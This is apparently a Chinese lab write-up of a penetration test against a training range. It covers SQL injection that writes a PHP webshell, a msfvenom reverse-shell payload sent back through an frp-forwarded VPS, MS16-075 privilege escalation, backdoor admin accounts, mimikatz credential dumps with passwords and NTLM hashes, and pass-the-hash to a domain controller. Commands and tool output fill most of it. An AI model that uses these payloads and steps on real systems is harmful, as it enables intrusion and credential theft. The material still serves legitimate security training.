渗透测试靶场记录

发布于 2021-11-14  6882 次阅读


0x00 web SQL注入

首先拿到urlhttp://afsgr16-b1ferw.aqlab.cn/?id=1,有id=1,尝试SQL注入。

输入id=1',出现报错信息,不难得知存在SQL注入,且拿到了网站根目录路径C:\phpStudy\WWW\,靶机是在Windows下用PHPstudy搭建。

**Fatal error**: Call to a member function fetchAll() on a non-object in **C:\phpStudy\WWW\index.php** on line **56**

?id=1.1 union select 1,"<?php eval($_REQUEST[cmd]);?>" into outfile 'C:/phpstudy/www/114514.php'可以写入shell,拿到了webshell。

使用蚁剑连接,查看当前用户,应该是个低权限用户,接下来就是提权。

C:\phpStudy\WWW> whoami
win-55ook7lana1\test

0x01 端口转发连接msf

由于该靶机无法访问我们的kali虚拟机,需要进行转发才能连接到虚拟机的msf上。

这里选用的是frp来进行端口转发。

首先得有一台公网vps,设置frps.ini,内容如下,只需修改bind_port为用于与客户端通信的端口即可。运行frps -c frps.ini

[common]
bind_port = 2021

然后在虚拟机中设置frpc.ini,内容如下,其中server_addr修改为vps的ip地址,server_port为上述设置的通信用的端口。local_ip就是虚拟机ip,然后将vps的remote_port端口上的数据转发到local_port上。运行frpc -c frpc.ini即可进行端口转发。

[common]
server_addr = <vps_ip>
server_port = 2021

[ssh]
type = tcp
local_ip = 192.168.32.128
local_port = 4444
remote_port = 4444

随后利用msfvenom来生成反弹shell到msf的木马文件,命令如下,LHOST修改为vps的ip地址,LPORT修改为上述remote_port的地址。由于目标靶机是Windows主机,所以生成exe文件。

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<vps_ip> LPORT=4444 -f exe > payload.exe

随后在虚拟机的msf中运行如下:

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.32.128
LHOST => 192.168.32.128
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.32.128:4444 

在蚁剑的终端中上传运行生成的木马文件payload.exe,端口转发反弹shell到msf成功。

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.32.128:4444 
[*] Sending stage (175174 bytes) to 192.168.32.128
[*] Meterpreter session 1 opened (192.168.32.128:4444 -> 192.168.32.128:57458) at 2021-10-16 14:33:03 +0800

meterpreter >

0x02 权限提升

接下来就是信息收集然后提权了。

meterpreter运行命令shell进入Windows的cmd命令行中,运行命令systeminfo 来收集本机信息,当然可以将结果保存在文件中便于查看。

结果如下,系统版本为Microsoft Windows Server 2008 R2 Standard,安装了两个补丁,KB2999226,KB976902

主机名:           WIN-55OOK7LANA1
OS 名称:          Microsoft Windows Server 2008 R2 Standard 
OS 版本:          6.1.7601 Service Pack 1 Build 7601
OS 制造商:        Microsoft Corporation
OS 配置:          独立服务器
OS 构件类型:      Multiprocessor Free
注册的所有人:     Windows 用户
注册的组织:       
产品 ID:          00477-001-0000421-84879
初始安装日期:     2020/6/12, 8:22:09
系统启动时间:     2021/10/9, 21:04:24
系统制造商:       VMware, Inc.
系统型号:         VMware Virtual Platform
系统类型:         x64-based PC
处理器:           安装了 2 个处理器。
                  [01]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
                  [02]: Intel64 Family 6 Model 62 Stepping 4 GenuineIntel ~2800 Mhz
BIOS 版本:        Phoenix Technologies LTD 6.00, 2018/12/12
Windows 目录:     C:\Windows
系统目录:         C:\Windows\system32
启动设备:         \Device\HarddiskVolume1
系统区域设置:     zh-cn;中文(中国)
输入法区域设置:   zh-cn;中文(中国)
时区:             (UTC+08:00)北京,重庆,香港特别行政区,乌鲁木齐
物理内存总量:     2,047 MB
可用的物理内存:   613 MB
虚拟内存: 最大值: 4,095 MB
虚拟内存: 可用:   2,266 MB
虚拟内存: 使用中: 1,829 MB
页面文件位置:     C:\pagefile.sys
域:               WORKGROUP
登录服务器:       暂缺
修补程序:         安装了 2 个修补程序。
                  [01]: KB2999226
                  [02]: KB976902
网卡:             安装了 1 个 NIC。
                  [01]: vmxnet3 以太网适配器
                      连接名:      本地连接
                      启用 DHCP:   是
                      DHCP 服务器: 10.0.1.1
                      IP 地址
                        [01]: 10.0.1.4
                        [02]: fe80::518:ffa:1f73:c4c2

之后可以利用windows-exploit-suggester来获取可能存在的漏洞信息。

先进行更新下载数据,然后安装xlrd,最后获取信息。system.txt中保存了上述systeminfo的输出结果。

$ python windows-exploit-suggester.py --update
[*] initiating winsploit version 3.3...
[+] writing to file 2021-10-16-mssb.xls
[*] done
$ pip install xlrd==1.2.0
$ python windows-exploit-suggester.py -d 2021-10-16-mssb.xls -i system.txt

可以看到输出了很多结果,这里我们就选用MS16-075来进行提权。

[M] MS16-075: Security Update for Windows SMB Server (3164038) - Important
[*]   https://github.com/foxglovesec/RottenPotato
[*]   https://github.com/Kevin-Robertson/Tater
[*]   https://bugs.chromium.org/p/project-zero/issues/detail?id=222 -- Windows: Local WebDAV NTLM Reflection Elevation of Privilege
[*]   https://foxglovesecurity.com/2016/01/16/hot-potato/ -- Hot Potato - Windows Privilege Escalation
[*]

run exploit/windows/local/ms16_075_reflection_juicy lhost=47.108.154.109 lport=4444

meterpreter > getuid
Server username: WIN-55OOK7LANA1\Administrator

net user so4ms abc123456.! /add添加用户

net localgroup administrators so4ms /add将用户加入本地管理员用户组。

令牌窃取获取system权限。

meterpreter > use incognito 
Loading extension incognito...Success.
meterpreter > list_tokens -u
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
WIN-55OOK7LANA1\Administrator
WIN-55OOK7LANA1\cc
WIN-55OOK7LANA1\ms1
WIN-55OOK7LANA1\wf
WIN-55OOK7LANA1\xx

Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON

meterpreter > impersonate_token "NT AUTHORITY\SYSTEM"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM

0x03 信息收集

明文密码抓取

使用mimikatz抓取明文密码,这里出现了报错mimikatz x86 cannot access x64 processmimikatz默认加载32位,对于64位很多模块无法默认加载,需要把meterpreter进程迁移到一个64位程序的进程中。

meterpreter > load kiwi 
Loading extension kiwi...
  .#####.   mimikatz 2.2.0 20191125 (x86/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

[!] Loaded x86 Kiwi on an x64 architecture.

Success.
meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK

meterpreter > kiwi_cmd sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process

进程迁移

meterpreter > ps

Process List
============
 PID   PPID  Name               Arch  Session  User                           Path
 ---   ----  ----               ----  -------  ----                           ----
896   1472  explorer.exe       x64   2        WIN-55OOK7LANA1\Administrator  C:\Windows\explorer.exe

meterpreter > migrate 896
[*] Migrating from 2992 to 896...
[*] Migration completed successfully.

再来抓取密码,拿到Administrator账户的密码woshifengge1.

Authentication Id : 0 ; 371991 (00000000:0005ad17)
Session           : RemoteInteractive from 2
User Name         : Administrator
Domain            : WIN-55OOK7LANA1
Logon Server      : WIN-55OOK7LANA1
Logon Time        : 2021/10/20 20:18:49
SID               : S-1-5-21-968729399-1073357432-1689370247-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN-55OOK7LANA1
         * LM       : 9ce0172ee7ebc970764a5f2b155e5903
         * NTLM     : 4d1de63584701c85b8b9eccf5243ef83
         * SHA1     : e20325b7a39aaf06a30914a61c1be19388c058e8
        tspkg :
         * Username : Administrator
         * Domain   : WIN-55OOK7LANA1
         * Password : woshifengge1.
        wdigest :
         * Username : Administrator
         * Domain   : WIN-55OOK7LANA1
         * Password : woshifengge1.
        kerberos :
         * Username : administrator
         * Domain   : zkaq.cn
         * Password : (null)
        ssp :
         [00000000]
         * Username : a1021
         * Domain   : ZKAQ
         * Password : A1B2C3!.Qa
        credman :

内网主机存活

ifconfig找到靶机内网ip为10.0.1.4

Interface 11
============
Name         : vmxnet3 
                       c
Hardware MAC : 00:0c:29:a6:55:d4
MTU          : 1500
IPv4 Address : 10.0.1.4
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::518:ffa:1f73:c4c2
IPv6 Netmask : ffff:ffff:ffff:ffff::

使用模块post/windows/gather/arp_scanner来扫描同段ip

meterpreter > run post/windows/gather/arp_scanner rhosts=10.0.1.4/24

[*] Running module against WIN-55OOK7LANA1
[*] ARP Scanning 10.0.1.4/24
[+]     IP: 10.0.1.4 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)
[+]     IP: 10.0.1.3 MAC 00:0c:29:4f:81:ae (VMware, Inc.)
[+]     IP: 10.0.1.8 MAC 00:0c:29:17:f5:7e (VMware, Inc.)
[+]     IP: 10.0.1.9 MAC 00:0c:29:2b:63:ca (VMware, Inc.)
[+]     IP: 10.0.1.1 MAC 00:0c:29:10:02:aa (VMware, Inc.)
[+]     IP: 10.0.1.6 MAC 00:0c:29:5b:78:0b (VMware, Inc.)
[+]     IP: 10.0.1.255 MAC 00:0c:29:a6:55:d4 (VMware, Inc.)

内网主机端口扫描

要扫描内网主机端口,先添加路由。

run autoroute -s 10.0.1.0/24添加路由

meterpreter > run autoroute -s 10.0.1.0/24

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 10.0.1.0/255.255.255.0...
[+] Added route to 10.0.1.0/255.255.255.0 via 192.168.32.128
[*] Use the -p option to list all active routes

run autoroute -p查看添加的路由。

meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   10.0.1.0           255.255.255.0      Session 2

开启socks4a服务。

msf6 exploit(multi/handler) > use auxiliary/server/socks_proxy
msf6 auxiliary(server/socks_proxy) > set VERSION 4a
VERSION => 4a
msf6 auxiliary(server/socks_proxy) > run
[*] Auxiliary module running as background job 0.

/etc/proxychains.conf中添加socks4 127.0.0.1 1080

然后就可以利用proxychainsnmap扫描端口了。

proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.0/24 --open

但是这里扫描速度很慢。由于之前已经扫描出同段ip了,直接限制扫描的ip可以稍微快一点。

proxychains nmap -sT -Pn -p 22,80,445,3306,3389 10.0.1.3 10.0.1.8 10.0.1.9 10.0.1.6 --open

Nmap scan report for 10.0.1.3
Host is up (12s latency).
Not shown: 4 closed ports
PORT   STATE SERVICE
80/tcp open  http

Nmap scan report for 10.0.1.8
Host is up (0.45s latency).
Not shown: 3 closed ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap scan report for 10.0.1.9
Host is up (0.20s latency).
Not shown: 1 closed port
PORT     STATE SERVICE
80/tcp   open  http
445/tcp  open  microsoft-ds
3306/tcp open  mysql
3389/tcp open  ms-wbt-server

Nmap scan report for 10.0.1.6
Host is up (0.41s latency).
Not shown: 3 closed ports
PORT     STATE SERVICE
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

哈希传递

6、8、9开启了445端口。只有8哈希传递登录成功。

hashdump获取hash值。

meterpreter > run post/windows/gather/hashdump

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 17e42cef0c5064217743f92bed737fa3...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1009:aad3b435b51404eeaad3b435b51404ee:77be122bef1c2d43f67721c95114f46b:::
shengxia:1013:aad3b435b51404eeaad3b435b51404ee:39f0f28ac072f26ea62ae53ae4786139:::
zx:1016:aad3b435b51404eeaad3b435b51404ee:c06e0b17f64c832a7d555168550ea75e:::
ms:1019:aad3b435b51404eeaad3b435b51404ee:2a8075a02dce44c2ed2af466b1f4f15f:::
xx:1021:aad3b435b51404eeaad3b435b51404ee:d5c485977ca5cf40e793cc99f0e51687:::
ms1:1022:aad3b435b51404eeaad3b435b51404ee:6886e033b9773dcaa2439416c561187f:::
cc:1023:aad3b435b51404eeaad3b435b51404ee:ce6d846f23351b24925b853f5a8f4c83:::
rxx:1024:aad3b435b51404eeaad3b435b51404ee:1b8b3b6223f73c08e22e99b2dd03003a:::
wf:1026:aad3b435b51404eeaad3b435b51404ee:62869a9d714197aca8b9c0f20e9e2884:::
so4ms:1027:aad3b435b51404eeaad3b435b51404ee:11d2fc51e410c0966a8e4a3530c963f8:::

登录。

msf6 auxiliary(server/socks_proxy) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set RHOSTS 10.0.1.8
RHOSTS => 10.0.1.8
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp 
payload => windows/meterpreter/bind_tcp
msf6 exploit(windows/smb/psexec) > set SMBUser Administrator
SMBUser => Administrator
msf6 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
SMBPass => aad3b435b51404eeaad3b435b51404ee:4d1de63584701c85b8b9eccf5243ef83
msf6 exploit(windows/smb/psexec) > run

[*] 10.0.1.8:445 - Connecting to the server...
[*] 10.0.1.8:445 - Authenticating to 10.0.1.8:445 as user 'Administrator'...
[*] 10.0.1.8:445 - Selecting PowerShell target
[*] 10.0.1.8:445 - Executing the payload...
[+] 10.0.1.8:445 - Service start timed out, OK if running a command or non-service executable...
[*] Started bind TCP handler against 10.0.1.8:4444
[*] Sending stage (175174 bytes) to 10.0.1.8
[*] Meterpreter session 4 opened (10.0.1.4:41689 -> 10.0.1.8:4444) at 2021-10-22 14:12:27 +0800

成功登录进入10.0.1.8主机

域信息

ipconfig /all可以看到DNS服务器为10.0.1.6,可以得知域控的ip地址为10.0.1.6

C:\Windows\system32>ipconfig /all
ipconfig /all

Windows IP Configuration

   Host Name . . . . . . . . . . . . : A1
   Primary Dns Suffix  . . . . . . . : zkaq.cn
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : zkaq.cn
                                       localdomain
Ethernet adapter �������� 2:

   Connection-specific DNS Suffix  . : localdomain
   Description . . . . . . . . . . . : vmxnet3 ���������� #2
   Physical Address. . . . . . . . . : 00-0C-29-17-F5-7E
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::81b8:ac83:7a57:b952%13(Preferred) 
   IPv4 Address. . . . . . . . . . . : 10.0.1.8(Preferred) 
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : 2021��10��19�� 22:16:46
   Lease Expires . . . . . . . . . . : 2021��10��22�� 15:16:46
   Default Gateway . . . . . . . . . : 10.0.1.1
   DHCP Server . . . . . . . . . . . : 10.0.1.1
   DHCPv6 IAID . . . . . . . . . . . : 268438569
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-26-74-83-9E-00-0C-29-A6-55-D4
   DNS Servers . . . . . . . . . . . : 10.0.1.6
                                       114.114.114.114
   NetBIOS over Tcpip. . . . . . . . : Enabled

获取域内计算机,只有一台A1,也就是10.0.1.8

C:\Windows\system32>net view /domain:zkaq
net view /domain:zkaq
Server Name            Remark

-------------------------------------------------------------------------------
\\A1                                                                           
The command completed successfully.

获取域内用户,有krbtgt

C:\Windows\system32>net user /domain
net user /domain
The request will be processed at a domain controller for domain zkaq.cn.


User accounts for \\DC.zkaq.cn

-------------------------------------------------------------------------------
a1021                    Administrator            Guest                    
krbtgt                   nf                       
The command completed with one or more errors.

获取域管理员为Administrator

C:\Windows\system32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain zkaq.cn.

Group name     Domain Admins
Comment        ����������Ա

Members

-------------------------------------------------------------------------------
Administrator            
The command completed successfully.

NTLM

kiwi_cmd sekurlsa::msv列出NTLM,拿到域控的NTLM61465a991b168727b65b3644aab823cd

meterpreter > kiwi_cmd privilege::debug
Privilege '20' OK

meterpreter > kiwi_cmd sekurlsa::msv

Authentication Id : 0 ; 381160 (00000000:0005d0e8)
Session           : RemoteInteractive from 3
User Name         : administrator
Domain            : ZKAQ
Logon Server      : DC
Logon Time        : 2020/6/20 19:36:09
SID               : S-1-5-21-4098506371-3349406080-1400905760-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : ZKAQ
         * NTLM     : 61465a991b168727b65b3644aab823cd
         * SHA1     : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d
         [00010000] CredentialKeys
         * NTLM     : 61465a991b168727b65b3644aab823cd
         * SHA1     : 5b48c7f5a5facbb5df950bb501b9da8dcd86db3d

0x04 登录域控

有了域控的NTLM后利用impacket登录域控

$ proxychains python3 smbexec.py -hashes :61465a991b168727b65b3644aab823cd ZKAQ/Administrator@10.0.1.6
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.24.dev1+20210922.102044.c7bc76f8 - Copyright 2021 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:1080-<><>-10.0.1.6:445-<><>-OK
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>ipconfig /all
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec

Windows IP ����

   ������  . . . . . . . . . . . . . : DC
   �� DNS ��׺ . . . . . . . . . . . : zkaq.cn
   �ڵ�����  . . . . . . . . . . . . : ���
   IP ·�������� . . . . . . . . . . : ��
   WINS ���������� . . . . . . . . . : ��
   DNS ��׺�����б�  . . . . . . . . : zkaq.cn

net user so4ms abc123456.! /add添加用户

net localgroup administrators so4ms /add将用户加入本地管理员用户组。

添加成功。

C:\Windows\system32>net localgroup administrators
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
����     administrators
ע��     ����Ա�Լ����/���в������Ƶ���ȫ����Ȩ

��Ա

-------------------------------------------------------------------------------
a1021
Administrator
Domain Admins
Enterprise Admins
nf
so4ms

首先回到10.0.1.9的session中,然后执行run getgui -e

proxychains rdesktop -u administrator -p woshifengge1. 10.0.1.8远程桌面连接10.0.1.8,然后在这台主机中登录域控。

直接连接域控的话会报错Failed to connect, CredSSP required by server (check if server has disabled old TLS versions, if yes use -V option).,需要用域内主机连接域控。

远程桌面登录成功。

image-20211022145642247